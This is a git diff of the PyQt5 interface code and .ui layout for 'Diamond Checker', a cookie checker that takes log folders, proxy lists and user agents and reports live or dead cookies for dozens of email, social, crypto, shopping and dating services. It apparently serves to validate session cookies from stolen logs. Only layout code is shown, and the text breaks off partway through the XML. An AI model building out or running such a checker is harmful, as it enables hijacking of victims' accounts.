self.gridLayout_2.addWidget(self.temu_checkbox, 2, 1, 1, 1) + self.fiverr_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.fiverr_checkbox.setEnabled(False) + self.fiverr_checkbox.setObjectName("fiverr_checkbox") + self.gridLayout_2.addWidget(self.fiverr_checkbox, 2, 2, 1, 1) + self.zillow_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.zillow_checkbox.setEnabled(False) + self.zillow_checkbox.setObjectName("zillow_checkbox") + self.gridLayout_2.addWidget(self.zillow_checkbox, 2, 3, 1, 1) + self.instacart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.instacart_checkbox.setEnabled(False) + self.instacart_checkbox.setObjectName("instacart_checkbox") + self.gridLayout_2.addWidget(self.instacart_checkbox, 2, 4, 1, 1) + self.google_play_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.google_play_checkbox.setObjectName("google_play_checkbox") + self.gridLayout_2.addWidget(self.google_play_checkbox, 3, 0, 1, 1) + self.vinted_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.vinted_checkbox.setEnabled(False) + self.vinted_checkbox.setObjectName("vinted_checkbox") + self.gridLayout_2.addWidget(self.vinted_checkbox, 3, 1, 1, 1) + self.walmart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.walmart_checkbox.setEnabled(False) + self.walmart_checkbox.setObjectName("walmart_checkbox") + self.gridLayout_2.addWidget(self.walmart_checkbox, 3, 2, 1, 1) + self.inbox_tab_widget.addTab(self.shopping_tab, "") + self.daiting_tab = QtWidgets.QWidget() + self.daiting_tab.setObjectName("daiting_tab") + self.widget4 = QtWidgets.QWidget(self.daiting_tab) + self.widget4.setGeometry(QtCore.QRect(20, 0, 751, 221)) + self.widget4.setObjectName("widget4") + self.gridLayout_5 = QtWidgets.QGridLayout(self.widget4) + self.gridLayout_5.setContentsMargins(0, 0, 0, 0) + self.gridLayout_5.setObjectName("gridLayout_5") + self.ashley_madison_checkbox = QtWidgets.QCheckBox(self.widget4) + self.ashley_madison_checkbox.setEnabled(False) + self.ashley_madison_checkbox.setObjectName("ashley_madison_checkbox") + self.gridLayout_5.addWidget(self.ashley_madison_checkbox, 0, 0, 1, 1) + self.zoosk_checkbox = QtWidgets.QCheckBox(self.widget4) + self.zoosk_checkbox.setEnabled(False) + self.zoosk_checkbox.setObjectName("zoosk_checkbox") + self.gridLayout_5.addWidget(self.zoosk_checkbox, 0, 1, 1, 1) + self.meetme_checkbox = QtWidgets.QCheckBox(self.widget4) + self.meetme_checkbox.setEnabled(False) + self.meetme_checkbox.setObjectName("meetme_checkbox") + self.gridLayout_5.addWidget(self.meetme_checkbox, 0, 2, 1, 1) + self.eharmony_checkbox = QtWidgets.QCheckBox(self.widget4) + self.eharmony_checkbox.setEnabled(False) + self.eharmony_checkbox.setObjectName("eharmony_checkbox") + self.gridLayout_5.addWidget(self.eharmony_checkbox, 1, 0, 1, 1) + self.tinder_checkbox = QtWidgets.QCheckBox(self.widget4) + self.tinder_checkbox.setEnabled(False) + self.tinder_checkbox.setObjectName("tinder_checkbox") + self.gridLayout_5.addWidget(self.tinder_checkbox, 1, 1, 1, 1) + self.christan_mingle_checkbox = QtWidgets.QCheckBox(self.widget4) + self.christan_mingle_checkbox.setEnabled(False) + self.christan_mingle_checkbox.setObjectName("christan_mingle_checkbox") + self.gridLayout_5.addWidget(self.christan_mingle_checkbox, 1, 2, 1, 1) + self.inbox_tab_widget.addTab(self.daiting_tab, "") + self.number_of_label = QtWidgets.QLabel(self.centralwidget) + self.number_of_label.setGeometry(QtCore.QRect(540, 280, 71, 31)) + self.number_of_label.setObjectName("number_of_label") + self.files_label = QtWidgets.QLabel(self.centralwidget) + self.files_label.setGeometry(QtCore.QRect(540, 310, 71, 31)) + self.files_label.setObjectName("files_label") + self.folders_label = QtWidgets.QLabel(self.centralwidget) + self.folders_label.setGeometry(QtCore.QRect(540, 340, 71, 31)) + self.folders_label.setObjectName("folders_label") + self.cookies_label = QtWidgets.QLabel(self.centralwidget) + self.cookies_label.setGeometry(QtCore.QRect(540, 380, 71, 21)) + self.cookies_label.setObjectName("cookies_label") + self.cookie_stats_label = QtWidgets.QLabel(self.centralwidget) + self.cookie_stats_label.setGeometry(QtCore.QRect(700, 290, 81, 21)) + self.cookie_stats_label.setObjectName("cookie_stats_label") + self.live_label = QtWidgets.QLabel(self.centralwidget) + self.live_label.setGeometry(QtCore.QRect(700, 320, 71, 21)) + self.live_label.setObjectName("live_label") + self.dead_label = QtWidgets.QLabel(self.centralwidget) + self.dead_label.setGeometry(QtCore.QRect(700, 350, 71, 21)) + self.dead_label.setObjectName("dead_label") + self.errors_label = QtWidgets.QLabel(self.centralwidget) + self.errors_label.setGeometry(QtCore.QRect(700, 380, 71, 21)) + self.errors_label.setObjectName("errors_label") + self.stats_box.raise_() + self.lineEdit_dir.raise_() + self.lineEdit_proxy.raise_() + self.lineEdit_ua.raise_() + self.checkBox_ua.raise_() + self.label_2.raise_() + self.pushButton.raise_() + self.progressBar.raise_() + self.pushButton_dir_logs.raise_() + self.pushButton_proxies_files.raise_() + self.pushButton_useragents_file.raise_() + self.textEdit_console.raise_() + self.social_network_label.raise_() + self.spinBox_thr.raise_() + self.label_lgbt.raise_() + self.comboBox_proxy.raise_() + self.inbox_tab_widget.raise_() + self.number_of_label.raise_() + self.files_label.raise_() + self.folders_label.raise_() + self.cookies_label.raise_() + self.cookie_stats_label.raise_() + self.live_label.raise_() + self.dead_label.raise_() + self.errors_label.raise_() + MainWindow.setCentralWidget(self.centralwidget) + self.statusbar = QtWidgets.QStatusBar(MainWindow) + self.statusbar.setObjectName("statusbar") + MainWindow.setStatusBar(self.statusbar) + + self.retranslateUi(MainWindow) + self.inbox_tab_widget.setCurrentIndex(0) + self.pushButton_proxies_files.clicked.connect(MainWindow.proxies_file) # type: ignore + self.pushButton_dir_logs.clicked.connect(MainWindow.dir_logs) # type: ignore + self.pushButton_useragents_file.clicked.connect(MainWindow.useragents_file) # type: ignore + QtCore.QMetaObject.connectSlotsByName(MainWindow) + + def retranslateUi(self, MainWindow): + _translate = QtCore.QCoreApplication.translate + MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) + self.lineEdit_dir.setText(_translate("MainWindow", "The path to the logs")) + self.lineEdit_proxy.setText(_translate("MainWindow", "The path to the proxy")) + self.lineEdit_ua.setText(_translate("MainWindow", "The path to user agents")) + self.checkBox_ua.setText(_translate("MainWindow", "Enable")) + self.pushButton.setText(_translate("MainWindow", "Start")) + self.pushButton_dir_logs.setText(_translate("MainWindow", "Choose a path")) + self.pushButton_proxies_files.setText(_translate("MainWindow", "Choose a path")) + self.pushButton_useragents_file.setText(_translate("MainWindow", "Choose a path")) + self.textEdit_console.setHtml(_translate("MainWindow", "\n" +"\n" +"


")) + self.textEdit_console.setPlaceholderText(_translate("MainWindow", "Diamond Checker - A Cookie Checker Brought To You By DiamondSorter - An Opensourced.Pro Project")) + self.social_network_label.setText(_translate("MainWindow", "Threads")) + self.comboBox_proxy.setItemText(0, _translate("MainWindow", "off")) + self.comboBox_proxy.setItemText(1, _translate("MainWindow", "socks4")) + self.comboBox_proxy.setItemText(2, _translate("MainWindow", "socks5")) + self.comboBox_proxy.setItemText(3, _translate("MainWindow", "http")) + self.gmail_inbox_checkbox.setText(_translate("MainWindow", "Gmail")) + self.yandex_checkbox.setText(_translate("MainWindow", "Yandex")) + self.yahoo_checkbox.setText(_translate("MainWindow", "Yahoo")) + self.outlook_checkbox.setText(_translate("MainWindow", "Outlook")) + self.webmail_checkbox.setText(_translate("MainWindow", "Webmail")) + self.mailru_checkbox.setText(_translate("MainWindow", "Mail.Ru")) + self.cpanel_checkbox.setText(_translate("MainWindow", "Cpanel")) + self.office_checkbox.setText(_translate("MainWindow", "Office")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.inbox_tab), _translate("MainWindow", "Inbox")) + self.bing_ads_checkbox.setText(_translate("MainWindow", "Bing Ads")) + self.reddit_ads__checkbox.setText(_translate("MainWindow", "Reddit Ads")) + self.ahref_checkbox.setText(_translate("MainWindow", "AHref SEO")) + self.snapchat_ads_checkbox.setText(_translate("MainWindow", "Snapchat Ads")) + self.tinder_ads_checkbox.setText(_translate("MainWindow", "Tinder Ads")) + self.twitter_ads_checkbox.setText(_translate("MainWindow", "Twitter Ads")) + self.sem_rush_checkbox.setText(_translate("MainWindow", "SEM Rush")) + self.craigslist_ads_checkbox.setText(_translate("MainWindow", "Craigslist Ads")) + self.facebookads__checkbox.setText(_translate("MainWindow", "Facebook Ads")) + self.microsoft_ads_checkbox.setText(_translate("MainWindow", "Microsoft Ads")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.ads_tab), _translate("MainWindow", "Ads")) + self.checkBox_steam.setText(_translate("MainWindow", "Steam")) + self.checkBox_pathofexile.setText(_translate("MainWindow", "PathofExile")) + self.checkBox_roblox.setText(_translate("MainWindow", "Roblox")) + self.checkBox_battlenet.setText(_translate("MainWindow", "BattleNet")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.game_tab), _translate("MainWindow", "Games")) + self.checkBox_instagram.setText(_translate("MainWindow", "Instagram")) + self.myspace_checkbox.setText(_translate("MainWindow", "Myspace")) + self.reddit_checkbox.setText(_translate("MainWindow", "Reddit")) + self.checkBox_discord.setText(_translate("MainWindow", "Discord")) + self.kick_checkbox.setText(_translate("MainWindow", "Kick")) + self.checkBox_facebook_ads.setText(_translate("MainWindow", "Facebook")) + self.checkBox_tiktok.setText(_translate("MainWindow", "TikTok")) + self.pintrest_checkbox.setText(_translate("MainWindow", "Pintrest")) + self.checkBox_youtube.setText(_translate("MainWindow", "YouTube")) + self.vimeo_checkbox.setText(_translate("MainWindow", "Vimeo")) + self.rumble_checkbox.setText(_translate("MainWindow", "Rumble")) + self.localsapp_checkbox.setText(_translate("MainWindow", "Locals")) + self.snapchat_checkbox.setText(_translate("MainWindow", "Snapchat")) + self.patreon_checkbox.setText(_translate("MainWindow", "Patreon")) + self.checkBox_netflix.setText(_translate("MainWindow", "Netflix")) + self.checkBox_vk.setText(_translate("MainWindow", "VK")) + self.twitch_checkbox.setText(_translate("MainWindow", "Twitch")) + self.linkedin_checkbox.setText(_translate("MainWindow", "LinkedIn")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.social_network_tab), _translate("MainWindow", "Social network")) + self.checkBox_coinbase.setText(_translate("MainWindow", "CoinBase")) + self.checkBox_kryptex.setText(_translate("MainWindow", "Kryptex")) + self.checkBox_hitbtc.setText(_translate("MainWindow", "HitBTC")) + self.checkBox_freebitcoin.setText(_translate("MainWindow", "FreeBitcoin")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.crypto_wallets_tab), _translate("MainWindow", "Crypto wallet")) + self.checkBox_amazon.setText(_translate("MainWindow", "Amazon")) + self.ebay_checkbox.setText(_translate("MainWindow", "Ebay")) + self.airbnb_checkbox.setText(_translate("MainWindow", "AirBNB")) + self.envato_checkbox.setText(_translate("MainWindow", "Envato Elements")) + self.flipkart_checkbox.setText(_translate("MainWindow", "Flipkart")) + self.checkBox_funpay.setText(_translate("MainWindow", "FunPay")) + self.kleinanzeigen_checkbox.setText(_translate("MainWindow", "Kleinanzeigen")) + self.booking_checkbox.setText(_translate("MainWindow", "Booking.com")) + self.uber_eats_checkbox.setText(_translate("MainWindow", "Uber Eats")) + self.dh_gate_checkbox.setText(_translate("MainWindow", "DH Gate")) + self.checkBox_humble.setText(_translate("MainWindow", "Humble")) + self.temu_checkbox.setText(_translate("MainWindow", "Temu")) + self.fiverr_checkbox.setText(_translate("MainWindow", "Fiverr")) + self.zillow_checkbox.setText(_translate("MainWindow", "Zillow")) + self.instacart_checkbox.setText(_translate("MainWindow", "Instacart")) + self.google_play_checkbox.setText(_translate("MainWindow", "Google Play")) + self.vinted_checkbox.setText(_translate("MainWindow", "Vinted")) + self.walmart_checkbox.setText(_translate("MainWindow", "Walmart")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.shopping_tab), _translate("MainWindow", "Shop")) + self.ashley_madison_checkbox.setText(_translate("MainWindow", "AshleyMaddison")) + self.zoosk_checkbox.setText(_translate("MainWindow", "Zoosk")) + self.meetme_checkbox.setText(_translate("MainWindow", "MeetMe")) + self.eharmony_checkbox.setText(_translate("MainWindow", "EHarmony")) + self.tinder_checkbox.setText(_translate("MainWindow", "Tinder")) + self.christan_mingle_checkbox.setText(_translate("MainWindow", "ChristanMingle")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.daiting_tab), _translate("MainWindow", "Daiting")) + self.number_of_label.setText(_translate("MainWindow", "Number of:")) + self.files_label.setText(_translate("MainWindow", "Files:")) + self.folders_label.setText(_translate("MainWindow", "Folders:")) + self.cookies_label.setText(_translate("MainWindow", "Cookies:")) + self.cookie_stats_label.setText(_translate("MainWindow", "Cookie Stats:")) + self.live_label.setText(_translate("MainWindow", "Live:")) + self.dead_label.setText(_translate("MainWindow", "Dead:")) + self.errors_label.setText(_translate("MainWindow", "Errors:")) + + +if __name__ == "__main__": + import sys + app = QtWidgets.QApplication(sys.argv) + MainWindow = QtWidgets.QMainWindow() + ui = Ui_MainWindow() + ui.setupUi(MainWindow) + MainWindow.show() + sys.exit(app.exec_()) diff --git a/DiamondChecker/main_ui.ui b/DiamondChecker/main_ui.ui index f4f05fd..c14b9d6 100644 --- a/DiamondChecker/main_ui.ui +++ b/DiamondChecker/main_ui.ui @@ -1,1877 +1,1877 @@ - - - MainWindow - - - - 0 - 0 - 801 - 820 - - - - - 801 - 677 - - - - - 801 - 999 - - - - - 801 - 677 - - - - - 801 - 677 - - - - MainWindow - - - QLineEdit, -QComboBox, -QDateTimeEdit, -QSpinBox, -QDoubleSpinBox { - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; -} - -QWidget { - background-color: #232629; - color: #ffffff; -} - -QGroupBox, -QFrame { - background-color: #232629; - border: 2px solid #4f5b62; - border-radius: 4px; -} - -QRadioButton::indicator, -QCheckBox::indicator { - width: 16px; - height: 16px; - border: 2px solid #1de9b6; - border-radius: 0; - transform: rotate(45deg); - transform-origin: center; -} - -QRadioButton::indicator:checked, -QCheckBox::indicator:checked { - background-color: #1de9b6; - border-color: #1de9b6; -} - -QRadioButton::indicator:hover, -QCheckBox::indicator:hover { - border-color: rgba(29, 233, 182, 0.8); -} - -QRadioButton::indicator:checked:hover, -QCheckBox::indicator:checked:hover { - border-color: #1de9b6; -} - - - - - - 10 - 280 - 421 - 31 - - - - - Furore - 10 - - - - QLineEdit, -QComboBox, -QDateTimeEdit, -QSpinBox, -QDoubleSpinBox { - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; -} - -QWidget { - background-color: #232629; - color: #ffffff; -} - -QGroupBox, -QFrame { - background-color: #232629; - border: 2px solid #4f5b62; - border-radius: 4px; -} - -QRadioButton::indicator, -QCheckBox::indicator { - width: 16px; - height: 16px; - border: 2px solid #1de9b6; - border-radius: 0; - transform: rotate(45deg); - transform-origin: center; -} - -QRadioButton::indicator:checked, -QCheckBox::indicator:checked { - background-color: #1de9b6; - border-color: #1de9b6; -} - -QRadioButton::indicator:hover, -QCheckBox::indicator:hover { - border-color: rgba(29, 233, 182, 0.8); -} - -QRadioButton::indicator:checked:hover, -QCheckBox::indicator:checked:hover { - border-color: #1de9b6; -} - - - The path to the logs - - - - - - 10 - 320 - 331 - 31 - - - - - Furore - 10 - - - - QLineEdit, -QComboBox, -QDateTimeEdit, -QSpinBox, -QDoubleSpinBox { - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; -} - -QWidget { - background-color: #232629; - color: #ffffff; -} - -QGroupBox, -QFrame { - background-color: #232629; - border: 2px solid #4f5b62; - border-radius: 4px; -} - -QRadioButton::indicator, -QCheckBox::indicator { - width: 16px; - height: 16px; - border: 2px solid #1de9b6; - border-radius: 0; - transform: rotate(45deg); - transform-origin: center; -} - -QRadioButton::indicator:checked, -QCheckBox::indicator:checked { - background-color: #1de9b6; - border-color: #1de9b6; -} - -QRadioButton::indicator:hover, -QCheckBox::indicator:hover { - border-color: rgba(29, 233, 182, 0.8); -} - -QRadioButton::indicator:checked:hover, -QCheckBox::indicator:checked:hover { - border-color: #1de9b6; -} - - - The path to the proxy - - - - - - 10 - 360 - 331 - 31 - - - - - Furore - 10 - - - - QLineEdit, -QComboBox, -QDateTimeEdit, -QSpinBox, -QDoubleSpinBox { - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; -} - -QWidget { - background-color: #232629; - color: #ffffff; -} - -QGroupBox, -QFrame { - background-color: #232629; - border: 2px solid #4f5b62; - border-radius: 4px; -} - -QRadioButton::indicator, -QCheckBox::indicator { - width: 16px; - height: 16px; - border: 2px solid #1de9b6; - border-radius: 0; - transform: rotate(45deg); - transform-origin: center; -} - -QRadioButton::indicator:checked, -QCheckBox::indicator:checked { - background-color: #1de9b6; - border-color: #1de9b6; -} - -QRadioButton::indicator:hover, -QCheckBox::indicator:hover { - border-color: rgba(29, 233, 182, 0.8); -} - -QRadioButton::indicator:checked:hover, -QCheckBox::indicator:checked:hover { - border-color: #1de9b6; -} - - - The path to user agents - - - - - - 440 - 360 - 81 - 31 - - - - - MS Shell Dlg 2 - 9 - true - - - - color: #c8c8c8 - - - Enable - - - - - - 10 - 740 - 601 - 51 - - - - QLineEdit, -QComboBox, -QDateTimeEdit, -QSpinBox, -QDoubleSpinBox { - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; -} - -QWidget { - background-color: #232629; - color: #ffffff; -} - -QGroupBox, -QFrame { - background-color: #232629; - border: 2px solid #4f5b62; - border-radius: 4px; -} - -QRadioButton::indicator, -QCheckBox::indicator { - width: 16px; - height: 16px; - border: 2px solid #1de9b6; - border-radius: 0; - transform: rotate(45deg); - transform-origin: center; -} - -QRadioButton::indicator:checked, -QCheckBox::indicator:checked { - background-color: #1de9b6; - border-color: #1de9b6; -} - -QRadioButton::indicator:hover, -QCheckBox::indicator:hover { - border-color: rgba(29, 233, 182, 0.8); -} - -QRadioButton::indicator:checked:hover, -QCheckBox::indicator:checked:hover { - border-color: #1de9b6; -} - - - - - - - - - 620 - 740 - 171 - 51 - - - - - Furore - 12 - - - - QLineEdit, -QComboBox, -QDateTimeEdit, -QSpinBox, -QDoubleSpinBox { - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; -} - -QWidget { - background-color: #232629; - color: #ffffff; -} - -QGroupBox, -QFrame { - background-color: #232629; - border: 2px solid #4f5b62; - border-radius: 4px; -} - -QRadioButton::indicator, -QCheckBox::indicator { - width: 16px; - height: 16px; - border: 2px solid #1de9b6; - border-radius: 0; - transform: rotate(45deg); - transform-origin: center; -} - -QRadioButton::indicator:checked, -QCheckBox::indicator:checked { - background-color: #1de9b6; - border-color: #1de9b6; -} - -QRadioButton::indicator:hover, -QCheckBox::indicator:hover { - border-color: rgba(29, 233, 182, 0.8); -} - -QRadioButton::indicator:checked:hover, -QCheckBox::indicator:checked:hover { - border-color: #1de9b6; -} - - - Start - - - - - - 180 - 750 - 421 - 31 - - - - background-color: #181818; -border: 3px solid #363636; -color: #c8c8c8 - - - 24 - - - false - - - Qt::Horizontal - - - false - - - - - - 430 - 280 - 91 - 31 - - - - - - - Choose a path - - - - - - 340 - 320 - 91 - 31 - - - - - - - Choose a path - - - - - - 340 - 360 - 91 - 31 - - - - - - - Choose a path - - - - - - 10 - 20 - 781 - 251 - - - - background-color: #181818; -border: 3px solid #363636; -color: #c8c8c8 - - - <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd"> -<html><head><meta name="qrichtext" content="1" /><meta charset="utf-8" /><style type="text/css"> -p, li { white-space: pre-wrap; } -hr { height: 1px; border-width: 0; } -li.unchecked::marker { content: "\2610"; } -li.checked::marker { content: "\2612"; } -</style></head><body style=" font-family:'Segoe UI'; font-size:9pt; font-weight:400; font-style:normal;"> -<p align="center" style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><br /></p></body></html> - - - Diamond Checker - A Cookie Checker Brought To You By DiamondSorter - An Opensourced.Pro Project - - - - - - 10 - 740 - 161 - 51 - - - - - Furore - 10 - - - - - - - Threads - - - - - - 90 - 750 - 71 - 31 - - - - - Impact - 10 - - - - QLineEdit, -QComboBox, -QDateTimeEdit, -QSpinBox, -QDoubleSpinBox { - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; -} - -QWidget { - background-color: #232629; - color: #ffffff; -} - -QGroupBox, -QFrame { - background-color: #232629; - border: 2px solid #4f5b62; - border-radius: 4px; -} - -QRadioButton::indicator, -QCheckBox::indicator { - width: 16px; - height: 16px; - border: 2px solid #1de9b6; - border-radius: 0; - transform: rotate(45deg); - transform-origin: center; -} - -QRadioButton::indicator:checked, -QCheckBox::indicator:checked { - background-color: #1de9b6; - border-color: #1de9b6; -} - -QRadioButton::indicator:hover, -QCheckBox::indicator:hover { - border-color: rgba(29, 233, 182, 0.8); -} - -QRadioButton::indicator:checked:hover, -QCheckBox::indicator:checked:hover { - border-color: #1de9b6; -} - - - - - - 0 - 0 - 801 - 5 - - - - - - - true - - - - - - 440 - 320 - 71 - 21 - - - - - MS Sans Serif - 10 - - - - - - - - off - - - - - socks4 - - - - - socks5 - - - - - http - - - - - - - 530 - 280 - 261 - 131 - - - - - Impact - 12 - - - - - - - - - - - - - 10 - 430 - 781 - 281 - - - - - Furore - - - - Qt::TabFocus - - - Qt::DefaultContextMenu - - - false - - - QTabWidget::pane { /* The tab widget frame */ - border-top: 2px solid #000000; - position: absolute; - top: -0.5em; -} - -QTabWidget::tab-bar { - alignment: center; -} - -/* Style the tab using the tab sub-control. Note that - it reads QTabBar _not_ QTabWidget */ -QTabBar::tab { - background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, - stop: 0 #000000, stop: 0.4 #000000, - stop: 0.5 #000000, stop: 1.0 #000000); - border: 2px solid ; - selection-color: rgb(15, 255, 167); - border-bottom-color: #000000; /* same as the pane color */ - border-top-left-radius: 12px; - border-top-right-radius: 12px; - min-width: 8ex; - padding: 8px; -} - -QTabBar::tab:selected, QTabBar::tab:hover { - background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, - stop: 0 #000000, stop: 0.4 #000000, - stop: 0.5 #000000, stop: 1.0 #000000); -} - -QTabBar::tab:selected { - border-color: #00def2; - border-bottom-color: #00def2; /* same as pane color */ -} - - - QTabWidget::North - - - QTabWidget::Rounded - - - 0 - - - Qt::ElideNone - - - false - - - false - - - - Inbox - - - - - 9 - 10 - 761 - 221 - - - - - - - false - - - Gmail - - - - - - - false - - - Yandex - - - - - - - false - - - Yahoo - - - - - - - false - - - Outlook - - - - - - - false - - - Webmail - - - - - - - false - - - Mail.Ru - - - - - - - false - - - Cpanel - - - - - - - false - - - Office - - - - - - - - - Ads - - - - - 10 - 10 - 761 - 211 - - - - - - - false - - - Bing Ads - - - - - - - false - - - Reddit Ads - - - - - - - false - - - AHref SEO - - - - - - - false - - - Snapchat Ads - - - - - - - false - - - Tinder Ads - - - - - - - false - - - Twitter Ads - - - - - - - false - - - SEM Rush - - - - - - - false - - - Craigslist Ads - - - - - - - Facebook Ads - - - - - - - false - - - Microsoft Ads - - - - - - - - - Games - - - - - 10 - 10 - 761 - 201 - - - - - - - - Furore - - - - - - - Steam - - - - - - - - Furore - - - - - - - PathofExile - - - - - - - - Furore - - - - - - - Roblox - - - - - - - - Furore - - - - - - - BattleNet - - - - - - - - - Social network - - - - - 10 - 10 - 761 - 231 - - - - - - - - Furore - - - - - - - Instagram - - - - - - - false - - - - Arial - - - - Myspace - - - - - - - false - - - Reddit - - - - - - - - Furore - - - - - - - Discord - - - - - - - Kick - - - - - - - - Furore - - - - - - - Facebook - - - - - - - - Furore - - - - - - - TikTok - - - - - - - false - - - Pintrest - - - - - - - - Furore - - - - - - - YouTube - - - - - - - Vimeo - - - - - - - false - - - Rumble - - - - - - - false - - - Locals - - - - - - - false - - - Snapchat - - - - - - - false - - - Patreon - - - - - - - - Furore - - - - - - - Netflix - - - - - - - - Furore - - - - - - - VK - - - - - - - false - - - Twitch - - - - - - - false - - - LinkedIn - - - - - - - - - Crypto wallet - - - - - 10 - 10 - 761 - 221 - - - - - - - - Furore - - - - - - - CoinBase - - - - - - - - Furore - - - - - - - Kryptex - - - - - - - - Furore - - - - - - - HitBTC - - - - - - - - Furore - - - - - - - FreeBitcoin - - - - - - - - - Shop - - - - - 10 - 10 - 731 - 211 - - - - - - - - Furore - - - - - - - Amazon - - - - - - - false - - - Ebay - - - - - - - false - - - AirBNB - - - - - - - false - - - Envato Elements - - - - - - - false - - - Flipkart - - - - - - - - Furore - - - - - - - FunPay - - - - - - - false - - - Kleinanzeigen - - - - - - - false - - - Booking.com - - - - - - - false - - - Uber Eats - - - - - - - false - - - DH Gate - - - - - - - - Furore - - - - - - - Humble - - - - - - - false - - - Temu - - - - - - - false - - - Fiverr - - - - - - - false - - - Zillow - - - - - - - false - - - Instacart - - - - - - - Google Play - - - - - - - false - - - Vinted - - - - - - - false - - - Walmart - - - - - - - - - Daiting - - - - - 20 - 0 - 751 - 221 - - - - - - - false - - - AshleyMaddison - - - - - - - false - - - Zoosk - - - - - - - false - - - MeetMe - - - - - - - false - - - EHarmony - - - - - - - false - - - Tinder - - - - - - - false - - - ChristanMingle - - - - - - - - - - - 540 - 280 - 71 - 31 - - - - Number of: - - - - - - 540 - 310 - 71 - 31 - - - - Files: - - - - - - 540 - 340 - 71 - 31 - - - - Folders: - - - - - - 540 - 380 - 71 - 21 - - - - Cookies: - - - - - - 700 - 290 - 81 - 21 - - - - Cookie Stats: - - - - - - 700 - 320 - 71 - 21 - - - - Live: - - - - - - 700 - 350 - 71 - 21 - - - - Dead: - - - - - - 700 - 380 - 71 - 21 - - - - Errors: - - - stats_box - lineEdit_dir - lineEdit_proxy - lineEdit_ua - checkBox_ua - label_2 - pushButton - progressBar - pushButton_dir_logs - pushButton_proxies_files - pushButton_useragents_file - textEdit_console - social_network_label - spinBox_thr - label_lgbt - comboBox_proxy - inbox_tab_widget - number_of_label - files_label - folders_label - cookies_label - cookie_stats_label - live_label - dead_label - errors_label - - - - - - - pushButton_proxies_files - clicked() - MainWindow - proxies_file() - - - 500 - 350 - - - 399 - 436 - - - - - pushButton_dir_logs - clicked() - MainWindow - dir_logs() - - - 500 - 295 - - - 399 - 436 - - - - - pushButton_useragents_file - clicked() - MainWindow - useragents_file() - - - 500 - 395 - - - 399 - 436 - - - - - - dir_logs() - proxies_file() - useragents_file() - - + + + MainWindow + + + + 0 + 0 + 801 + 820 + + + + + 801 + 677 + + + + + 801 + 999 + + + + + 801 + 677 + + + + + 801 + 677 + + + + MainWindow + + + QLineEdit, +QComboBox, +QDateTimeEdit, +QSpinBox, +QDoubleSpinBox { + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; +} + +QWidget { + background-color: #232629; + color: #ffffff; +} + +QGroupBox, +QFrame { + background-color: #232629; + border: 2px solid #4f5b62; + border-radius: 4px; +} + +QRadioButton::indicator, +QCheckBox::indicator { + width: 16px; + height: 16px; + border: 2px solid #1de9b6; + border-radius: 0; + transform: rotate(45deg); + transform-origin: center; +} + +QRadioButton::indicator:checked, +QCheckBox::indicator:checked { + background-color: #1de9b6; + border-color: #1de9b6; +} + +QRadioButton::indicator:hover, +QCheckBox::indicator:hover { + border-color: rgba(29, 233, 182, 0.8); +} + +QRadioButton::indicator:checked:hover, +QCheckBox::indicator:checked:hover { + border-color: #1de9b6; +} + + + + + + 10 + 280 + 421 + 31 + + + + + Furore + 10 + + + + QLineEdit, +QComboBox, +QDateTimeEdit, +QSpinBox, +QDoubleSpinBox { + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; +} + +QWidget { + background-color: #232629; + color: #ffffff; +} + +QGroupBox, +QFrame { + background-color: #232629; + border: 2px solid #4f5b62; + border-radius: 4px; +} + +QRadioButton::indicator, +QCheckBox::indicator { + width: 16px; + height: 16px; + border: 2px solid #1de9b6; + border-radius: 0; + transform: rotate(45deg); + transform-origin: center; +} + +QRadioButton::indicator:checked, +QCheckBox::indicator:checked { + background-color: #1de9b6; + border-color: #1de9b6; +} + +QRadioButton::indicator:hover, +QCheckBox::indicator:hover { + border-color: rgba(29, 233, 182, 0.8); +} + +QRadioButton::indicator:checked:hover, +QCheckBox::indicator:checked:hover { + border-color: #1de9b6; +} + + + The path to the logs + + + + + + 10 + 320 + 331 + 31 + + + + + Furore + 10 + + + + QLineEdit, +QComboBox, +QDateTimeEdit, +QSpinBox, +QDoubleSpinBox { + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; +} + +QWidget { + background-color: #232629; + color: #ffffff; +} + +QGroupBox, +QFrame { + background-color: #232629; + border: 2px solid #4f5b62; + border-radius: 4px; +} + +QRadioButton::indicator, +QCheckBox::indicator { + width: 16px; + height: 16px; + border: 2px solid #1de9b6; + border-radius: 0; + transform: rotate(45deg); + transform-origin: center; +} + +QRadioButton::indicator:checked, +QCheckBox::indicator:checked { + background-color: #1de9b6; + border-color: #1de9b6; +} + 